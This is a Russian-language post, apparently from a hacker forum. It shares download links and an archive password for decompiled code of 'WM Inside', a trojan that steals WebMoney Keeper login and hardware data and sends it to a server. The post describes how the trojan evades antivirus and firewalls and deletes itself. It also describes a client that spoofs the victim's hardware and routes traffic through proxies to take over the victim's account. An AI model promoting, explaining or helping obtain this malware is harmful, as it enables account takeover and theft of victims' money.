Пожалуйста, обратите внимание, что пользователь заблокирован
Получены с помощью IDA
Только под кипер < 3.8.0.0
Сталобыть для боевых операций не годится.
Только для ознакомления.
Код слегка приведен в порядок.
http://www.sendspace.com/file/80nmim
http://www.filefactory.com/file/a11c043/n/vpablik.rar
Пароль: xss.pro/_4hv6y9v56hn9f85h6938h
Только под кипер < 3.8.0.0
Сталобыть для боевых операций не годится.
Только для ознакомления.
Код слегка приведен в порядок.
http://www.sendspace.com/file/80nmim
http://www.filefactory.com/file/a11c043/n/vpablik.rar
Пароль: xss.pro/_4hv6y9v56hn9f85h6938h
WM Inside
WebMoney Grabbing System
Программа предназначена для получения доступа к счетам пользователей WebMoney Keeper Classic.
При авторизации пользователя в системе (входе в кипер) программа грабит все необходимые авторизационные данные и отсылает на сервер. Никаких подмен номеров кошельков в буфере обмена, распознавания капч, программного нажатия кнопок, социнженерии и прочих "детских" методов. Вы сами сольете титульные знаки, когда посчитаете нужным. Не требуется доступ к мылу пользователя для активации. Всю необходимую инфу об оборудовании и системе пользователя трой собирает и отправляет на сервер.
Написан на ассемблере. Размер билда: 9 кБ несжатый.
Каждый билд криптуется уникальным ключем. (В будующем планируется полиморф).
Работа троя невидима для фаерволлов. (KIS 2009, OutPost, ZoneAlarm, возможно другие).
Не детектируется антивирусами. (VirusTotal: 0/39).
Работа происходит следующим образом.
После запуска ЕХЕ, дроппер устанавливает трой в систему (при наличии в ней WebMoney Keeper Classic) и самоудаляется. При следующем входе пользователя в систему WebMoney (при вводе WMID и пароля) трой отправляет сграбленную инфу на сервер, после чего самоудаляется.
К трою прилагаются скрипты: сборщик отчетов и просмотр отчетов в онлайн. Скрипты на PHP, БД не требуется.
Сграбленная инфа отображается в Online Log-Viewer'e по каждому ВМИДу, непосредственно оттуда она может импортироваться методом Copy+Paste в клиент (либо можно скачать и сохранить в файл).
Клиент представляет собой приложение, предназначенное для запуска из-под него Кипера с целью подмены в нем данных на нужные (сграбленные). Клиент запускает Кипер и производит необходимые изменения в памяти процесса Кипера, в результате чего Кипер передает на сервер ВМ не реальную информацию, а ту инфу, которую трой сграбил на машине пользователя (системная инфа и инфа об оборудовании). Этим достигается "прозрачный" вход на счет пользователя без необходимости активации оборудования по мылу или телефону. Клиент имеет приятный и интуитивно понятный графический интерфейс, работа с ним осуществляется "в два клика" - Log-Viewer: Ctrl+C; Client: "Import",Ctrl+V,"Run Keeper" - и Вы уже на нужном счете.
Клиент с Кипером можно запускать и на виртуальной машине - поскольку инфа об оборудовании подменяется, сервер WebMoney не узнает, что Кипер запущен на виртуальной машине.
Важная особенность - клиент имеет возможность соксификации Кипера. Для этого используется прокси-движок известной программы FreeCap. Вам не нужно запускать Кипер из FreeCap'a, в клиенте включаете опцию "Use FreeCap" и при запуске Кипера его соединения будут пущены через сокс, задаваемый в FreeCap'e (а в нем можно задавать как Socks 4/5, HTTP Proxy с авторизацией или без, так и цепочки из соксов). Поскольку Кипер передает на сервер локально определяемый IP адрес, то рекомендуется также использовать VPN (а также для безопасности). Сграбленная инфа может импортироваться и экспортироваться в/из клиент(а) как в виде текста (непосредственно из Log-Viewer'a), так и в виде файла, который может быть скачан из того же Log-Viewer'a или сохранен из клиента.
Работает с Кипером версии 3.7.0.0 (текущий), 3.6.0.6 (предыдущий), возможно и с другими (тестировалась только с указанными).
